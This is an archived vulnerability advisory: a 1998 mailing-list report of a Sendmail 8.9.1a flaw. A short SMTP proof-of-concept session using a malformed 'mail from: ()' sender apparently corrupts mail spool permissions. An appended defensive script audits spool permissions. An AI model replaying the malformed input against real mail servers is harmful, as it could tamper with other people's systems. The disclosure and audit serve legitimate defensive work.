sendmail.8.9.1-2.txt

17 Aug 1999 00:00:00 | Reported by Packet Storm | Type: packetstorm | Source: packetstormsecurity.com

Critical security flaw in Sendmail 8.9.1a/8.9.0 alters permissions without system hang.


Code
`Date: Thu, 24 Sep 1998 10:14:06 -0400  
From: Simon Smith <[email protected]>  
  
This is not the same attack as the last one regarding the "(".  
This one does not make your system hang but rather alters permissions it  
seems. If this was already posted please disregard it.  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Be conscious that Sendmail 8.9.1a/8.9.0 has a critical security  
flaw in it. I have tested this on Debian Linux. I have not had time to  
hack the source and find out where the hole is. (Yes I am going to give  
notice to sendmail.) I have not determined if other systems are open to  
this attack, but to check, create a user that you can eliminate.  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
begin exploit  
  
*****  
bogin:~$ telnet localhost 25  
Trying 127.0.0.1...  
Connected to localhost.  
Escape character is '^]'.  
220 host.com ESMTP Sendmail 8.9.1a/8.9.0; Thu, 24 Sep 1998 09:44:23 -0400  
mail from: ()  
250 MAILER-DAEMON... Sender ok  
rcpt to: tester  
250 tester... Recipient ok  
data  
354 Enter mail, end with "." on a line by itself  
bababababa  
.  
250 JAA15070 Message accepted for delivery  
quit  
221 bogin.ma.ultranet.com closing connection  
Connection closed by foreign host.  
bogin:~$ su - tester  
Password:  
bogin:~$ pine  
*****  
  
end exploit  
  
That is not the least of it. The mail was sent to tester, but watch what  
happens if I read the mail,  
then use pine to check e-mail.  
  
I get the following message inside of pine:  
"Mailbox vulnerable - directory must have 1777 protection "  
  
Downgrading to a preliminary version of sendmail will stop this from  
happening to you (8.8.8). If someone was to transmit mail to  
[email protected] you would be condemned.  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
  
  
  
Hmmm it was not like that before.  
  
I am still able to read the email.. but this causes problems..  
  
  
I apologize that I did not take this any farther. If anyone wants to dig  
into this please notify me of your findings  
  
  
Sincerely,  
SIMON  
  
p.s. if this is an old bug please tell me and forward me the details...  
not sure how it could be though seeing as it is the alpha release.... =oP  
`
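
The post reports a permissions change and a pine warning about the spool directory needing mode 1777, but does not say which file or directory changed. The following is an added example, not part of the original post: a small shell audit that snapshots mode and ownership of the mail spool directory and its mailboxes so the state before and after a test delivery can be compared. It assumes GNU coreutils `stat`; the spool path is supplied by the caller and any path shown in the comments is an assumption.

```shell
#!/bin/sh
# Added example: audit mail spool permissions before and after a test
# delivery to a throwaway account. Assumes GNU coreutils stat(1).

# Print "mode uid:gid path" for the spool directory and each entry in it.
spool_snapshot() {
    dir=$1
    stat -c '%a %u:%g %n' "$dir" || return 1
    for f in "$dir"/*; do
        # Skip the unexpanded glob when the directory is empty.
        [ -e "$f" ] && stat -c '%a %u:%g %n' "$f"
    done
    return 0
}

# Succeed only if the directory has the 1777 mode that pine asks for
# (world-writable with the sticky bit).
spool_dir_ok() {
    [ "$(stat -c '%a' "$1")" = "1777" ]
}

# Print every line of the "after" snapshot that is absent from the
# "before" snapshot: entries whose mode or owner changed, or new files.
# Exit status is 0 when at least one difference was found.
spool_changes() {
    before=$1
    after=$2
    grep -Fxv -f "$before" "$after"
}

# Typical use (the spool path is an assumption; adjust for the host):
#   spool_snapshot /var/spool/mail > /tmp/spool.before
#   ... deliver the test message and read it as the test user ...
#   spool_snapshot /var/spool/mail > /tmp/spool.after
#   spool_changes /tmp/spool.before /tmp/spool.after
#   spool_dir_ok /var/spool/mail || echo "spool directory is not mode 1777"
```
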
